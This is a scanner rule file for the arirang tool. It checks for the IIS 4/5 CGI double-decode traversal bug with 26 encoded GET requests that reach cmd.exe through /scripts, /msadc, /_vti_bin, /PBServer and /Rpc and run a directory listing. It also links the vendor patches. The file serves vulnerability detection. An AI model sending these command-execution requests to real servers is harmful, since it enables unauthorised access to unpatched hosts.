###################################################################################################
#
# IIS 4/5 CGI Decode bug scan rule for arirang, tuxe
# information by
# Aldo Albuquerque - CCSA
# Tempest Security Technologies - http://www.tempest.com.br
# CESAR - Centro de Estudos e Sistemas Avançados do Recife -
# http://www.cesar.org.br
#
# rule by pilot
# http://www.monkey.org/~pilot
# pilot@monkey.org
#
#
#
#
# IIS 4/5 CGI Decoding bug found by nsfocus http://www.nsfocus.com/english/homepage/sa01-02.htm
# vendor patch
# IIS 4.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787
# IIS 5.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764
#
# Rule layout (as used below; the exact parser grammar is not shown in this file):
#   <expected response> "->" <method> ":" <request path> "^" <report label> ";;"
# Each rule appears to be terminated by ";;" and each comment line by a newline.
# Remediation: a host that answers any of these probes as expected is missing the
# vendor patch listed above; apply it and verify with the IIS 5 checklist linked at
# the end of this file.
200 OK-> GET :/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug1;;
200 OK-> GET :/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug2;;
200 OK-> GET :/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug3;;
200 OK-> GET :/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug4;;
200 OK-> GET :/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug5;;
200 OK-> GET :/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug6;;
200 OK-> GET :/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug7;;
200 OK-> GET :/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug8;;
200 OK-> GET :/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug9;;
200 OK-> GET :/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug10;;
200 OK-> GET :/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug11;;
200 OK-> GET :/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug12;;
200 OK-> GET :/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug13;;
200 OK-> GET :/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug14;;
#- Windows 2000 Server + SP1 + IIS5.0 - Default installation
#* The following combinations of directories/encodings work:
200 OK-> GET :/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug15;;
200 OK-> GET :/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug16;;
200 OK-> GET :/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug17;;
200 OK-> GET :/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug18;;
200 OK-> GET :/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug19;;
200 OK-> GET :/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug20;;
200 OK-> GET :/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug21;;
200 OK-> GET :/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug22;;
# NOTE(review): bug23-bug26 below repeat the request paths of bug11-bug14 exactly
# (only the report label differs), so a vulnerable host is reported twice for the
# same /_vti_bin probe. Kept as-is; consider dropping one set when maintaining this file.
200 OK-> GET :/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug23;;
200 OK-> GET :/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug24;;
200 OK-> GET :/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug25;;
200 OK-> GET :/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug26;;
# check secure IIS 5 http://www.microsoft.com/technet/security/iis5chk.asp